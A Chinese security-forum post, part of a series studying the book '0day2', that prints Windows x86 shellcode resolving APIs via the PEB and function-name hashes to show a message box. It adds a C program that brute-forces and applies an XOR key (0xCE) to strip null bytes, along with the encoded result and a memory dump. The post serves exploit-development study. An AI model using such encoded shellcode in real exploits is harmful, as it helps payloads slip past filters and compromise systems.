首页
社区
课程
招聘
[原创]旧书重温:0day2[5]shellcode变形记
发表于: 2013-12-14 08:43 4537

[原创]旧书重温:0day2[5]shellcode变形记

2013-12-14 08:43
4537

旧书重温:0day2【1】 简单的缓冲区溢出案例 http://bbs.pediy.com/showthread.php?t=182497
旧书重温:0day2【2】 实验:三种获取kernel32.dll基址的方法 http://bbs.pediy.com/showthread.php?t=182498
旧书重温:0day2【3】 详细解读PEB法 查找kener32地址 http://bbs.pediy.com/showthread.php?t=182499
旧书重温:0day2【4】动态获取函数地址 http://bbs.pediy.com/showthread.php?t=182520
旧书重温:0day2【5】shellcode变形记 http://bbs.pediy.com/showthread.php?t=182551
旧书重温:0day2【6】bind_shell http://bbs.pediy.com/showthread.php?t=182689
\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C\x8B\xF4\x8D\x7E\x0C\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B\x49\x1C\x57\x56\x8B\x69\x08\x8B\x79\x20\x8B\x09\x66\x39\x57\x18\x75\xF2\x5E\x5F\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB\x53\x68\x61\x61\x61\x61\x68\x62\x62\x62\x62\x8B\xC4\x53\x50\x50\x53\xFF\x57\xFC\x53\xFF\x57\xF8
int ishellcodelen = sizeof(shellcode);
    xorshellcode = new  char[ishellcodelen + 2];
    memset(xorshellcode,0x00,ishellcodelen+2);
    cpy = new  char[ishellcodelen + 2];
    memset(cpy,0x00,ishellcodelen+2);
    //printf(" %d = %d \r\n",ishellcodelen,strlen((const char *)shellcode));
    int i =0;
/*    
    for(int j =0;j < 0xff;j++)
    {

        for(i =0;i < ishellcodelen;i++)
        {
            xorshellcode[i] = shellcode[i] ^ j;

        
            
        }
        strcpy(cpy,xorshellcode);
        if(strlen(cpy) == strlen(xorshellcode))
        {
            printf("cpy is %d , xor is %d ",strlen(cpy),strlen(xorshellcode));
            printf("%x \r\n",j);
        }
    }
    */

    /*
    for( i =0;i < ishellcodelen;i++)
    {
        printf("0x%0.2x ",xorshellcode[i]);
        
    }
    
    printf("\r\n %d = %d \r\n",ishellcodelen,strlen((const char *)xorshellcode));
    */
    
        for(i =0;i < ishellcodelen;i++)
        {
            xorshellcode[i] = shellcode[i] ^ 0xCE;    
        }
    FILE * fp;

    if(!(fp=fopen("password2.txt","w+")))
    {
        printf("fp fopen flaid \n");
        int e = GetLastError();
        exit(0);
    }
    //int l = fputs((const char *)&(xorshellcode[0]),fp);
    int l = fwrite(xorshellcode,strlen(xorshellcode),sizeof( char),fp);
    printf("fp write byte %d \n",l);
    l = GetLastError();
    fclose(fp);/**/
cpy is 181 , xor is 181 0
cpy is 182 , xor is 182 1
cpy is 182 , xor is 182 2
cpy is 89 , xor is 89 3
cpy is 24 , xor is 24 4
cpy is 75 , xor is 75 5
cpy is 107 , xor is 107 6
cpy is 114 , xor is 114 7
cpy is 54 , xor is 54 8
cpy is 59 , xor is 59 9
cpy is 3 , xor is 3 a
cpy is 182 , xor is 182 b
cpy is 15 , xor is 15 c
cpy is 182 , xor is 182 d
cpy is 182 , xor is 182 e
cpy is 105 , xor is 105 f
cpy is 182 , xor is 182 10
cpy is 182 , xor is 182 11
cpy is 182 , xor is 182 12
cpy is 182 , xor is 182 13
cpy is 182 , xor is 182 14
cpy is 182 , xor is 182 15
cpy is 182 , xor is 182 16
cpy is 182 , xor is 182 17
cpy is 63 , xor is 63 18
cpy is 182 , xor is 182 19
cpy is 182 , xor is 182 1a
cpy is 182 , xor is 182 1b
cpy is 49 , xor is 49 1c
cpy is 182 , xor is 182 1d
cpy is 5 , xor is 5 1e
cpy is 182 , xor is 182 1f
cpy is 57 , xor is 57 20
cpy is 182 , xor is 182 21
cpy is 182 , xor is 182 22
cpy is 182 , xor is 182 23
cpy is 122 , xor is 122 24
cpy is 182 , xor is 182 25
cpy is 182 , xor is 182 26
cpy is 182 , xor is 182 27
cpy is 182 , xor is 182 28
cpy is 182 , xor is 182 29
cpy is 182 , xor is 182 2a
cpy is 25 , xor is 25 2b
cpy is 141 , xor is 141 2c
cpy is 182 , xor is 182 2d
cpy is 182 , xor is 182 2e
cpy is 182 , xor is 182 2f
cpy is 43 , xor is 43 30
cpy is 182 , xor is 182 31
cpy is 12 , xor is 12 32
cpy is 21 , xor is 21 33
cpy is 100 , xor is 100 34
cpy is 182 , xor is 182 35
cpy is 182 , xor is 182 36
cpy is 182 , xor is 182 37
cpy is 4 , xor is 4 38
cpy is 61 , xor is 61 39
cpy is 108 , xor is 108 3a
cpy is 120 , xor is 120 3b
cpy is 84 , xor is 84 3c
cpy is 69 , xor is 69 3d
cpy is 182 , xor is 182 3e
cpy is 182 , xor is 182 3f
cpy is 182 , xor is 182 40
cpy is 182 , xor is 182 41
cpy is 182 , xor is 182 42
cpy is 182 , xor is 182 43
cpy is 182 , xor is 182 44
cpy is 83 , xor is 83 45
cpy is 117 , xor is 117 46
cpy is 98 , xor is 98 47
cpy is 182 , xor is 182 48
cpy is 48 , xor is 48 49
cpy is 182 , xor is 182 4a
cpy is 45 , xor is 45 4b
cpy is 86 , xor is 86 4c
cpy is 182 , xor is 182 4d
cpy is 182 , xor is 182 4e
cpy is 10 , xor is 10 4f
cpy is 171 , xor is 171 50
cpy is 182 , xor is 182 51
cpy is 182 , xor is 182 52
cpy is 31 , xor is 31 53
cpy is 37 , xor is 37 54
cpy is 182 , xor is 182 55
cpy is 51 , xor is 51 56
cpy is 50 , xor is 50 57
cpy is 182 , xor is 182 58
cpy is 92 , xor is 92 59
cpy is 42 , xor is 42 5a
cpy is 182 , xor is 182 5b
cpy is 182 , xor is 182 5c
cpy is 182 , xor is 182 5d
cpy is 66 , xor is 66 5e
cpy is 67 , xor is 67 5f
cpy is 81 , xor is 81 60
cpy is 147 , xor is 147 61
cpy is 164 , xor is 164 62
cpy is 7 , xor is 7 63
cpy is 40 , xor is 40 64
cpy is 35 , xor is 35 65
cpy is 27 , xor is 27 66
cpy is 182 , xor is 182 67
cpy is 1 , xor is 1 68
cpy is 53 , xor is 53 69
cpy is 2 , xor is 2 6a
cpy is 182 , xor is 182 6b
cpy is 182 , xor is 182 6c
cpy is 182 , xor is 182 6d
cpy is 182 , xor is 182 6e
cpy is 182 , xor is 182 6f
cpy is 182 , xor is 182 70
cpy is 182 , xor is 182 71
cpy is 36 , xor is 36 72
cpy is 34 , xor is 34 73
cpy is 13 , xor is 13 74
cpy is 33 , xor is 33 75
cpy is 182 , xor is 182 76
cpy is 182 , xor is 182 77
cpy is 88 , xor is 88 78
cpy is 56 , xor is 56 79
cpy is 182 , xor is 182 7a
cpy is 134 , xor is 134 7b
cpy is 182 , xor is 182 7c
cpy is 182 , xor is 182 7d
cpy is 19 , xor is 19 7e
cpy is 182 , xor is 182 7f
cpy is 182 , xor is 182 80
cpy is 182 , xor is 182 81
cpy is 182 , xor is 182 82
cpy is 182 , xor is 182 83
cpy is 182 , xor is 182 84
cpy is 182 , xor is 182 85
cpy is 182 , xor is 182 86
cpy is 182 , xor is 182 87
cpy is 182 , xor is 182 88
cpy is 8 , xor is 8 89
cpy is 182 , xor is 182 8a
cpy is 16 , xor is 16 8b
cpy is 182 , xor is 182 8c
cpy is 18 , xor is 18 8d
cpy is 182 , xor is 182 8e
cpy is 182 , xor is 182 8f
cpy is 182 , xor is 182 90
cpy is 14 , xor is 14 91
cpy is 182 , xor is 182 92
cpy is 182 , xor is 182 93
cpy is 182 , xor is 182 94
cpy is 76 , xor is 76 95
cpy is 182 , xor is 182 96
cpy is 182 , xor is 182 97
cpy is 182 , xor is 182 98
cpy is 104 , xor is 104 99
cpy is 182 , xor is 182 9a
cpy is 182 , xor is 182 9b
cpy is 182 , xor is 182 9c
cpy is 182 , xor is 182 9d
cpy is 182 , xor is 182 9e
cpy is 182 , xor is 182 9f
cpy is 182 , xor is 182 a0
cpy is 182 , xor is 182 a1
cpy is 182 , xor is 182 a2
cpy is 182 , xor is 182 a3
cpy is 182 , xor is 182 a4
cpy is 182 , xor is 182 a5
cpy is 182 , xor is 182 a6
cpy is 182 , xor is 182 a7
cpy is 182 , xor is 182 a8
cpy is 154 , xor is 154 a9
cpy is 182 , xor is 182 aa
cpy is 145 , xor is 145 ab
cpy is 182 , xor is 182 ac
cpy is 68 , xor is 68 ad
cpy is 182 , xor is 182 ae
cpy is 182 , xor is 182 af
cpy is 182 , xor is 182 b0
cpy is 182 , xor is 182 b1
cpy is 182 , xor is 182 b2
cpy is 182 , xor is 182 b3
cpy is 182 , xor is 182 b4
cpy is 182 , xor is 182 b5
cpy is 182 , xor is 182 b6
cpy is 23 , xor is 23 b7
cpy is 182 , xor is 182 b8
cpy is 182 , xor is 182 b9
cpy is 182 , xor is 182 ba
cpy is 28 , xor is 28 bb
cpy is 182 , xor is 182 bc
cpy is 182 , xor is 182 bd
cpy is 106 , xor is 106 be
cpy is 182 , xor is 182 bf
cpy is 182 , xor is 182 c0
cpy is 112 , xor is 112 c1
cpy is 182 , xor is 182 c2
cpy is 182 , xor is 182 c3
cpy is 109 , xor is 109 c4
cpy is 182 , xor is 182 c5
cpy is 182 , xor is 182 c6
cpy is 182 , xor is 182 c7
cpy is 182 , xor is 182 c8
cpy is 182 , xor is 182 c9
cpy is 113 , xor is 113 ca
cpy is 182 , xor is 182 cb
cpy is 182 , xor is 182 cc
cpy is 90 , xor is 90 cd
cpy is 182 , xor is 182 ce
cpy is 182 , xor is 182 cf
cpy is 116 , xor is 116 d0
cpy is 9 , xor is 9 d1
cpy is 39 , xor is 39 d2
cpy is 182 , xor is 182 d3
cpy is 182 , xor is 182 d4
cpy is 182 , xor is 182 d5
cpy is 182 , xor is 182 d6
cpy is 182 , xor is 182 d7
cpy is 182 , xor is 182 d8
cpy is 182 , xor is 182 d9
cpy is 182 , xor is 182 da
cpy is 22 , xor is 22 db
cpy is 182 , xor is 182 dc
cpy is 95 , xor is 95 dd
cpy is 182 , xor is 182 de
cpy is 182 , xor is 182 df
cpy is 182 , xor is 182 e0
cpy is 182 , xor is 182 e1
cpy is 182 , xor is 182 e2
cpy is 26 , xor is 26 e3
cpy is 125 , xor is 125 e4
cpy is 182 , xor is 182 e5
cpy is 182 , xor is 182 e6
cpy is 182 , xor is 182 e7
cpy is 182 , xor is 182 e8
cpy is 182 , xor is 182 e9
cpy is 182 , xor is 182 ea
cpy is 118 , xor is 118 eb
cpy is 182 , xor is 182 ec
cpy is 182 , xor is 182 ed
cpy is 182 , xor is 182 ee
cpy is 182 , xor is 182 ef
cpy is 182 , xor is 182 f0
cpy is 119 , xor is 119 f1
cpy is 65 , xor is 65 f2
cpy is 182 , xor is 182 f3
cpy is 17 , xor is 17 f4
cpy is 103 , xor is 103 f5
cpy is 182 , xor is 182 f6
cpy is 182 , xor is 182 f7
cpy is 79 , xor is 79 f8
cpy is 182 , xor is 182 f9
cpy is 182 , xor is 182 fa
cpy is 182 , xor is 182 fb
cpy is 0 , xor is 0 fc
cpy is 182 , xor is 182 fd
cpy is 182 , xor is 182 fe
fp write byte 1
Press any key to continue
0012FB23        32 A6 A4 C4 F6 D0 A6 AD 47 1F 81 A6 FC BA    2Δ啮笑璆仸
0012FB33  5F C2 45 3A 43 B0 C2 FD 15 79 CA E5 2D A8 75 FD  _翬:C奥?y叔-╱?
0012FB43  FC 9D A6 BB BD AB BC 9A FD 1C AA 45 94 FE 45 85  鼭将細?狤旫E?
0012FB53  C2 45 87 D2 99 98 45 A7 C6 45 B7 EE 45 C7 A8 F7  翬囈櫂EE奉E迁?
0012FB63  99 D6 BB 3C 90 91 63 F3 A4 C4 F6 D0 BB CB 5B 31  欀?悜c螭啮谢薣1
0012FB73  99 36 5B AE 45 8B F2 45 82 CB B6 CD 03 45 97 EE  ?[瓻嬺E偹锻E楊
0012FB83  CD 13 FD 31 89 45 FA 75 CD 3B 57 C1 70 C8 F4 00  ??塃鷘?W羛若.
0012FB93  A4 C4 F6 D0 A6 AD 47 1F 81 A6 FC BA 5F C2 45 3A  つ鲂ΝG仸_翬:
0012FBA3  43 B0 C2 FD 15 79 CA E5 2D A8 75 FD FC 9D A6 BB  C奥?y叔-╱潶?
0012FBB3  BD AB BC 9A FD 1C AA 45 94 FE 45 85 C2 45 87 D2  将細?狤旫E吢E囈
0012FBC3  99 98 45 A7 C6 45 B7 EE 45 C7 A8 F7 99 D6 BB 3C  櫂EE奉E迁鳈只<
0012FBD3  90 91 63 F3 A4 C4 F6 D0 BB CB 5B 31 99 36        悜c螭啮谢薣1?
\x32\xA6\xA4\xC4\xF6\xD0\xA6\xAD\x47\x1F\x81\xA6\xFC\xBA\x5F\xC2\x45\x3A\x43\xB0\xC2\xFD\x15\x79\xCA\xE5\x2D\xA8\x75\xFD\xFC\x9D\xA6\xBB\xBD\xAB\xBC\x9A\xFD\x1C\xAA\x45\x94\xFE\x45\x85\xC2\x45\x87\xD2\x99\x98\x45\xA7\xC6\x45\xB7\xEE\x45\xC7\xA8\xF7\x99\xD6\xBB\x3C\x90\x91\x63\xF3\xA4\xC4\xF6\xD0\xBB\xCB\x5B\x31\x99\x36\x5B\xAE\x45\x8B\xF2\x45\x82\xCB\xB6\xCD\x03\x45\x97\xEE\xCD\x13\xFD\x31\x89\x45\xFA\x75\xCD\x3B\x57\xC1\x70[COLOR="Red"]\xC8\xF4\x0D\x0A\xBA\xC6\x0F\x04\xC9\xCD\x1E\x88\x25\x3F\xF5\x9A\xEA\xD2\xBB\x2A\x45\x97\xEA\xCD\x13\xA8\x45\xF2\xB5\x45\x97\xD2\xCD\x13\xCD\xE2\x75\x5B\x91\x65\x99\xAF\xF3\xA4\xC4\xF6\xD0\xBB\x67\xFD\x15\x9D\xA6\xAF\xAF\xAF\xAF\xA6\xAC\xAC\xAC\xAC\x45\x0D\x0A\x9D\x9E\x9E\x9D\x31\x99\x32\x9D[/COLOR]\x31\x99\x36

[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!

收藏
免费 5
支持
分享
最新回复 (3)
雪    币: 43
活跃值: (40)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
0day2确实好,可惜我买回来,没有看完,挑着看的,没有向楼主复现所有技术
2014-7-12 09:42
0
雪    币: 1555
活跃值: (3103)
能力值: ( LV11,RANK:180 )
在线值:
发帖
回帖
粉丝
3
纸上得来终觉浅,绝知此事要躬行; 实践中 见真知! 每次看说 目测感觉,我什么都明白!但是 真正把实验 做一遍,你才会发现,很多都不明白!
2014-7-15 09:13
0
雪    币: 1555
活跃值: (3103)
能力值: ( LV11,RANK:180 )
在线值:
发帖
回帖
粉丝
4
每天晚上 2个小时!  这个 实验 也就2小时吧,从温习文章 、 重点学习 到动手 调试 最多 2天 (2×2) = 4个小时 就 搞定了!
2014-7-15 09:14
0
游客
登录 | 注册 方可回帖
返回
//